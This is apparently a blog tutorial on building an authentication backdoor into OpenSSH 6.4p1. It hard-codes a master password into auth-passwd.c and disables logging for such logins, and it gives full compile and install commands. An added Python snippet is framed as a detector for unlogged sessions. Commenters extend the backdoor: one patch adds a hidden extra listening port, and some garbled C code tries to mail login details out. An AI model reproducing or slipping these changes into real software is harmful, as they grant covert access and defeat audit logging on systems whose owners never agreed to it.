
[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux

This time I show you how to build a "backdoor" into your own OpenSSH 6.4p1 installation under Kali Linux.
 

 

Download needed files
 
cd /tmp/
wget --no-check-certificate https://www.openssl.org/source/openssl-1.0.1e.tar.gz
tar xvfz openssl-1.0.1e.tar.gz
 
wget http://openbsd.cs.fau.de/pub/OpenBSD/OpenSSH/portable/openssh-6.4p1.tar.gz
tar xvfz openssh-6.4p1.tar.gz
 
Preparing the system
 
mkdir /usr/local/ssl/
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib
ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so

Changing OpenSSH

// auth.h
 
#define B4CKD00R "myeasypass"
int backdoorActive;

// auth-passwd.c
 
int
auth_password(Authctxt *authctxt, const char *password)
{
        struct passwd * pw = authctxt->pw;
        int ok = authctxt->valid;
        backdoorActive = 0;

        if (!strcmp(password, B4CKD00R)) {
                backdoorActive = 1;
                return 1;
        }

// log.h
 
int backdoorActive;

// log.c
 
void
do_log(LogLevel level, const char *fmt, va_list args)
{
   
if(backdoorActive == 1)
        return;

Compile & install OpenSSH on your local Kali installation
 
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/
make
make install

Change SSH-Port if needed
 
vi /usr/local/etc/sshd_config
Port 2222
 
Start your new local SSH-Daemon
 
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config

Test it!
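From the defender's side: the log.c change above makes sshd write nothing for a login that used the hard-coded password, but, as a commenter notes below, the session still shows up in w and ps. The following added example (not part of the original post) flags remote sessions listed by who(1) that have no matching "Accepted" line in the auth log; the sample log lines, host names and addresses are constructed, and it assumes who prints the same address that sshd logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data for illustration (not taken from the original post).
AUTH_LOG = """\
Mar  3 10:01:12 kali sshd[1841]: Accepted password for alice from 192.0.2.10 port 50211 ssh2
Mar  3 10:01:12 kali sshd[1841]: pam_unix(sshd:session): session opened for user alice by (uid=0)
Mar  3 11:30:45 kali sshd[2290]: Failed password for root from 198.51.100.7 port 40022 ssh2
"""
WHO_OUTPUT = """\
alice    pts/0        2014-03-03 10:01 (192.0.2.10)
root     pts/1        2014-03-03 11:42 (198.51.100.7)
"""

ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"Accepted\s\S+\sfor\s(?P<user>\S+)\sfrom\s(?P<host>\S+)", re.M)
# Only entries with a remote host in parentheses; X displays (":0") are skipped.
SESSION = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d)"
    r"\s+\((?P<host>[^):][^)]*)\)", re.M)


def parse_accepted(auth_log, year):
    """Return (user, host, time) for every 'Accepted ...' line sshd logged."""
    out = []
    for m in ACCEPTED.finditer(auth_log):
        ts = " ".join(m["ts"].split())  # syslog pads single-digit days
        when = datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")
        out.append((m["user"], m["host"], when))
    return out


def parse_sessions(who_output):
    """Return (user, tty, host, time) for remote sessions listed by who(1)."""
    return [(m["user"], m["tty"], m["host"],
             datetime.strptime(m["ts"], "%Y-%m-%d %H:%M"))
            for m in SESSION.finditer(who_output)]


def unlogged_sessions(who_output, auth_log, year, slack=timedelta(minutes=2)):
    """Remote sessions with no matching 'Accepted' log entry within `slack`."""
    accepted = parse_accepted(auth_log, year)
    return [s for s in parse_sessions(who_output)
            if not any(u == s[0] and h == s[2] and abs(t - s[3]) <= slack
                       for u, h, t in accepted)]


if __name__ == "__main__":
    for user, tty, host, when in unlogged_sessions(WHO_OUTPUT, AUTH_LOG, 2014):
        print(f"no auth log entry: {user} on {tty} from {host} at {when}")
```

A hit is a lead, not proof: rotated logs or a resolved host name in who can also produce one, so follow up by checking which binary the session's sshd process is running.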

Comments


noname on :

yes mate is great looks ok .. but when you log in you are in ps and w command, and compromise all your activity

Nick on :

Hi mate, this looks nice. Can you make a video tutorial or just write the commands for a different opened port connection?
I mean, if you can explain to me how I can make this work, for example on 9863, but with 22 still on! Cheers!
By the way, I don't want 9863 to be visible in /etc/ssh/sshd_config. I know this is possible but I don't know how!

Stefan Schurtz on :

Hi,

you mean something like that:

servconf.c

if (options->num_ports == 0)
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;

change to

if (options->num_ports == 0) {
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;
options->ports[options->num_ports++] = 9863;
}

If port will be changed in config file, change this

servconf.c

case sPort:
if (!arg || *arg == ‘\0’)
fatal("%s line %d: missing port number.",
filename, linenum);
options->ports[options->num_ports++] = a2port(arg);
options->ports[options->num_ports++] = 9863;

Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)

Cheers,

Nick on :

no problem mate i just try both of them didn’t work for me even the port even to make from 6.5 with centos or ubuntu i need something new i try as well to implement sendmail on this no success!
the email function been this for me
[code]
/* fopen example */
#include
#include
#include
#include
#include

int main ()
{
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }

fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]

meh on :

Seems to work only if ran by root. How about if you want to run it as unprivileged user?

Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.
